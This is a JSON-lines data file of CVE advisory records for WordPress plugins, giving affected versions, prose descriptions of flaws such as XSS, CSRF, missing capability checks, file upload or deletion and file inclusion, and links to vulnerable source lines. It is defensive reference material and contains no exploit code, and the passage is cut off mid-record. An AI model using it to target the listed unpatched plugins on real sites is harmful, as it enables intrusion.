{"CVE_ID":"CVE-2024-13638","slug":"order-attachments-for-woocommerce","versionImpact":"2.5.1","description":"The Order Attachments for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.1 via the 'uploads' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads directory which can contain file attachments added to orders.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-attachments-for-woocommerce\\\/trunk\\\/src\\\/WCOA\\\/Attachments\\\/Attachment.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-attachments-for-woocommerce\\\/trunk\\\/src\\\/WCOA\\\/Attachments\\\/Attachment.php#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-attachments-for-woocommerce\\\/trunk\\\/src\\\/WCOA\\\/Utils\\\/Ajax.php#L61\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-attachments-for-woocommerce\\\/trunk\\\/src\\\/WCOA\\\/Utils\\\/Ajax.php#L61\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e98b1ef-70dd-408d-8644-08933bca1cdd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e98b1ef-70dd-408d-8644-08933bca1cdd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3417","slug":"embedder","versionImpact":"1.3.5","description":"The Embedder plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the ajax_set_global_option() function in versions 1.3 to 1.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedder\\\/trunk\\\/emb-admin-ajax.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedder\\\/trunk\\\/emb-admin-ajax.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa86bcb9-e558-4b60-9473-65cd6f9663fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa86bcb9-e558-4b60-9473-65cd6f9663fd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3455","slug":"1-click-migration","versionImpact":"2.2","description":"The 1 Click WordPress Migration Plugin \u2013 100% FREE for a limited time plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'start_restore' function in all versions up to, and including, 2.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/1-click-migration\\\/trunk\\\/inc\\\/backup\\\/class-ocm-backup.php#L403\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/1-click-migration\\\/trunk\\\/inc\\\/backup\\\/class-ocm-backup.php#L403\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e982ae88-cfd0-46b9-ad64-00e398d307d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e982ae88-cfd0-46b9-ad64-00e398d307d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-39372","slug":"wpeventplus","versionImpact":"2.6.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in elbisnero WordPress Events Calendar Registration & Tickets allows Reflected XSS.This issue affects WordPress Events Calendar Registration & Tickets: from n\/a through 2.6.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpeventplus\\\/vulnerability\\\/wordpress-wordpress-events-calendar-registration-tickets-plugin-2-6-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpeventplus\\\/vulnerability\\\/wordpress-wordpress-events-calendar-registration-tickets-plugin-2-6-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6546","slug":"drive-folder-embeder","versionImpact":"1.1.0","description":"The Drive Folder Embedder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018tablecssclass\u2019 parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/drive-folder-embeder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/drive-folder-embeder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86b21472-6a76-4d7b-84ff-f8b79c052aba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86b21472-6a76-4d7b-84ff-f8b79c052aba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7645","slug":"extensions-for-cf7","versionImpact":"3.2.8","description":"The Extensions For CF7 (Contact form 7 Database, Conditional Fields and Redirection) plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'delete-file' field in all versions up to, and including, 3.2.8. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, when an administrator deletes the submission, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3330857%40extensions-for-cf7&new=3330857%40extensions-for-cf7&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3330857%40extensions-for-cf7&new=3330857%40extensions-for-cf7&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/extensions-for-cf7\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/extensions-for-cf7\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/894b43ed-143d-4c0b-afd1-05fcd6fa5018?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/894b43ed-143d-4c0b-afd1-05fcd6fa5018?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2280","slug":"wpdirectorykit","versionImpact":"1.2.2","description":"The WP Directory Kit plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'ajax_public' function in versions up to, and including, 1.2.2. This makes it possible for unauthenticated attackers to delete or change plugin settings, import demo data, delete Directory Kit related posts and terms, and install arbitrary plugins. A partial patch was introduced in version 1.2.0 and an additional partial patch was introduced in version 1.2.2, but the issue was not fully patched until 1.2.3.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abb1a758-5c16-4841-b1c7-0705ab16b328?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abb1a758-5c16-4841-b1c7-0705ab16b328?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907164\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907164\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/public\\\/class-wpdirectorykit-public.php#L249\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/public\\\/class-wpdirectorykit-public.php#L249\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4419","slug":"wp-backgrounds-lite","versionImpact":"2.3","description":"The WP-Backgrounds Lite plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.3. This is due to missing or incorrect nonce validation on the ino_save_data() function. This makes it possible for unauthenticated attackers to save meta data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7a05894-8f9d-442f-961c-2e80aa25c3db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7a05894-8f9d-442f-961c-2e80aa25c3db?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-backgrounds-lite\\\/trunk\\\/inoplugs_background_plugin.php#L179\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-backgrounds-lite\\\/trunk\\\/inoplugs_background_plugin.php#L179\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1650","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxRenameCategory function in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to rename categories.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9a3dc87-5309-41fe-bfc3-60b5878b6c57?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9a3dc87-5309-41fe-bfc3-60b5878b6c57?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1414","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Call To Action widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a12acf0-932e-4dff-9da6-9fbace11dbe1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a12acf0-932e-4dff-9da6-9fbace11dbe1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042217\\\/exclusive-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042217\\\/exclusive-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5162","slug":"prettyphoto","versionImpact":"1.2.3","description":"The WordPress prettyPhoto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c581616d-c9e7-46f2-9c2f-5e082a13fd0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c581616d-c9e7-46f2-9c2f-5e082a13fd0b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/prettyphoto\\\/trunk\\\/addon\\\/jltma-wpf-addon.php#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/prettyphoto\\\/trunk\\\/addon\\\/jltma-wpf-addon.php#L96\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8799","slug":"custom-banners","versionImpact":"3.3","description":"The Custom Banners plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49618d9f-e6d8-40d5-b19f-7ce987939172?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49618d9f-e6d8-40d5-b19f-7ce987939172?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-banners\\\/trunk\\\/include\\\/tgmpa\\\/init.php#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-banners\\\/trunk\\\/include\\\/tgmpa\\\/init.php#L96\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10868","slug":"enteraddons","versionImpact":"2.1.9","description":"The Enter Addons \u2013 Ultimate Template Builder for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.1.9 via the Advanced Tabs widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/enteraddons\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/enteraddons\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff8e8889-ec02-4b8d-9509-2c6335fdd9a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff8e8889-ec02-4b8d-9509-2c6335fdd9a4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11689","slug":"hq-rental-software","versionImpact":"1.5.29","description":"The HQ Rental Software plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.29. This is due to missing or incorrect nonce validation on the displaySettingsPage() function. This makes it possible for unauthenticated attackers to update arbitrary options that can be leveraged for privilege escalation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hq-rental-software\\\/tags\\\/1.5.29\\\/includes\\\/settings\\\/HQRentalsAdminSettings.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hq-rental-software\\\/tags\\\/1.5.29\\\/includes\\\/settings\\\/HQRentalsAdminSettings.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hq-rental-software\\\/tags\\\/1.5.29\\\/includes\\\/settings\\\/HQRentalsSettings.php#L489\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hq-rental-software\\\/tags\\\/1.5.29\\\/includes\\\/settings\\\/HQRentalsSettings.php#L489\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e9142b2-2935-4644-8c56-00789948202b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e9142b2-2935-4644-8c56-00789948202b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13646","slug":"single-user-chat","versionImpact":"0.5","description":"The Single-user-chat plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to insufficient validation on the 'single_user_chat_update_login' function in all versions up to, and including, 0.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to update option values to 'login' on the WordPress site. This may be leveraged to update an option that would create an error on the site and deny service to legitimate users or be used to set some values to true such as registration.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/single-user-chat\\\/trunk\\\/single-user-chat.php#L326\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/single-user-chat\\\/trunk\\\/single-user-chat.php#L326\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a4978c1-087f-4784-9691-91ca5044f60a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a4978c1-087f-4784-9691-91ca5044f60a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13725","slug":"infusionsoft-official-opt-in-forms","versionImpact":"2.0.1","description":"The Keap Official Opt-in Forms plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.0.1 via the service parameter. This makes it possible for unauthenticated attackers to include PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP files can be uploaded and included. If register_argc_argv is enabled on the server and pearcmd.php is installed, this issue might lead to Remote Code Execution.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infusionsoft-official-opt-in-forms\\\/trunk\\\/infusionsoft.php#L2540\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infusionsoft-official-opt-in-forms\\\/trunk\\\/infusionsoft.php#L2540\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/infusionsoft-official-opt-in-forms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/infusionsoft-official-opt-in-forms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/692a5838-4a32-4444-b1a0-018fa25594a9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/692a5838-4a32-4444-b1a0-018fa25594a9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13469","slug":"pricingtable","versionImpact":"1.12.10","description":"The Pricing Table by PickPlugins plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Button Link in all versions up to, and including, 1.12.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pricingtable\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pricingtable\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5239c414-cd1d-4257-9f8e-e7a92c2119f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5239c414-cd1d-4257-9f8e-e7a92c2119f9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2809","slug":"azurecurve-shortcodes-in-comments","versionImpact":"2.0.2","description":"The azurecurve Shortcodes in Comments plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.0.2. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/azurecurve-shortcodes-in-comments\\\/trunk\\\/azurecurve-shortcodes-in-comments.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/azurecurve-shortcodes-in-comments\\\/trunk\\\/azurecurve-shortcodes-in-comments.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/azurecurve-shortcodes-in-comments\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/azurecurve-shortcodes-in-comments\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22cc6da1-fd22-4b2a-90ab-24086879f0f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22cc6da1-fd22-4b2a-90ab-24086879f0f6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6540","slug":"web-cam","versionImpact":"1.0","description":"The web-cam plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018slug\u2019 parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/web-cam\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/web-cam\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2d2954c-762c-4bdc-8469-7fe19f4e980d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2d2954c-762c-4bdc-8469-7fe19f4e980d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0153","slug":"vimeo-video-autoplay-automute","versionImpact":"1.0","description":"The Vimeo Video Autoplay Automute WordPress plugin through 1.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3459868-28aa-4a5d-94d8-bbc17e3ce653\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3459868-28aa-4a5d-94d8-bbc17e3ce653\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0763","slug":"clock-in-portal","versionImpact":"2.1","description":"The Clock In Portal- Staff & Attendance Management WordPress plugin through 2.1 does not have CSRF check when deleting Holidays, which could allow attackers to make logged in admins delete arbitrary holidays via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4b55f868-62f8-43a1-9817-68cd1fc6190f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4b55f868-62f8-43a1-9817-68cd1fc6190f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2275","slug":"wcfm-marketplace-rest-api","versionImpact":"1.5.3","description":"The WooCommerce Multivendor Marketplace \u2013 REST API plugin for WordPress is vulnerable to unauthorized access of data and addition of data due to a missing capability check on the 'get_item', 'get_order_notes' and 'add_order_note' functions in versions up to, and including, 1.5.3. This makes it possible for authenticated attackers with subscriber privileges or above, to view the order details and order notes, and add order notes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wcfm-marketplace-rest-api\\\/tags\\\/1.5.3\\\/includes\\\/api\\\/class-api-order-controller.php#L167\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wcfm-marketplace-rest-api\\\/tags\\\/1.5.3\\\/includes\\\/api\\\/class-api-order-controller.php#L167\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2904331\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2904331\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0520601-7e5c-412d-a8da-df1bf8ce28df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0520601-7e5c-412d-a8da-df1bf8ce28df?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wcfm-marketplace-rest-api\\\/tags\\\/1.5.3\\\/includes\\\/api\\\/class-api-order-controller.php#L151\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wcfm-marketplace-rest-api\\\/tags\\\/1.5.3\\\/includes\\\/api\\\/class-api-order-controller.php#L151\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wcfm-marketplace-rest-api\\\/tags\\\/1.5.3\\\/includes\\\/api\\\/class-api-order-controller.php#L175\",\"name\":\"https:\